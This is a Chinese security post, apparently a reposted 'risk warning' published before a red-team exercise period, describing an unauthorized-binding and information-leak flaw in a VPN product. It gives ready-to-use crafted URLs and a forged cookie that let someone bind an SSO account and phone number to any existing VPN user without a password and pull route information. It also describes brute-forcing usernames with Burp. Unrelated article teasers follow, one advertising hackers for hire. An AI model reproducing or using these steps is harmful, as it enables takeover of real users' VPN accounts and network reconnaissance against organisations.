【风险预警】某捷VPN越权绑定和信息泄露

访客3年前黑客工具1116

0x01 简述

HVV临近,现预警一个某捷VPN的信息泄露及越权绑定SSO账号及手机号的问题

注:需要知道存在的VPN用户,当然如果不知道的话,可以使用文章后面的那个 *** 进行用户名爆破

话不多说先上图



0x02 越权绑定

首先打开VPN登录页,可以看到是这样子的



直接构造URL:

https://1.1.1.1/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=USERNAME&sid=1614345312&oper=showres

USERNAME为已存在的用户名,访问后即可进入到这样一个界面



然后我们点击左侧的“个人设置”



在如上图功能这里,没有任何密码验证,可以直接给这个用户绑定SSO账号及手机号



0x03?信息泄露

直接构造URL:

https://1.1.1.1/cgi-bin/main.cgi?oper=getrsc

注:需要先使用之一步的方式构造URL进入到设置页面,否则没有Cookie,会提示“错误:当前用户不在线,请重新登录”,当然你也可以手动构造Cookie

Cookie: UserName=USERNAME; SessionId=1614345312; FirstVist=1; Skin=1; tunnel=1



然后再打开的页面,就可以看到他VPN现有的路由信息



同时,通过Burp抓包可以发现,如果用户名是正确的,这个页面才会返回路由信息



如果用户是不存在的,就不会返回



通过这个 *** ,可以使用Burp进行用户名爆破

文章来源微信公众号:NearSec

相关文章

财务大写数字(财务大写数字标准写法)

一、中文大写金额数字应用正楷或行书填写,0123456789,对应的大写为:零壹亿贰仟叁佰肆拾伍万陆仟柒佰捌拾玖,不得自造简化字。二、中文大写金额数字到。 会计的数字大写一律用正楷或行书书写,如壹、...

敬老院虐待老人

《宪法》第四十九条第3款:禁止虐待老人、妇女和儿童。《刑法》第二百六十条:虐待家庭成员,情节恶劣的,处二年以上有期徒刑、拘役或者管制。据悉, 听说有此案例!有待于进一步查实! 随着时代的发展,中国的经...

全国人大常委会将审议推迟召开十三届人大三次会议

十三届全国人大常委会第四十七次委员长会议17日上午在北京人民大会堂举行,栗战书委员长主持。会议决定,十三届全国人大常委会第十六次会议2月24日在北京举行。 委员长会议建议,十三届全国人大常委会第十六...

戏还能再足一点吗?

今天打开支付宝,看到广州晓新希网络科技有限公司发来一条长新闻,是关于迪星币的说明。大致意思是要给充值的会员退款,还赔付。我查了历史文章,原来都已往半年了,岂非骗子良心发现?厥后仔细一看,果真照样想太多...

在家怎么可以赚钱,15个能在家里做的正规兼职

1、通过写软文赚钱 文职类的工作,在近几年的岗位职业中非常的火热,例如写通告稿、广告稿、微信软文等,这些都是目前较火的赚钱方式。同时,一些大学生也会通过兼职去写软文稿,赚取外快,当软文稿写得多的,相...

黑客代码大全手机(黑客装逼代码大全bat)-点击了可能被黑客攻击的网页

黑客代码大全手机(黑客装逼代码大全bat)-点击了可能被黑客攻击的网页

黑客代码大全手机(黑客装逼代码大全bat)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、...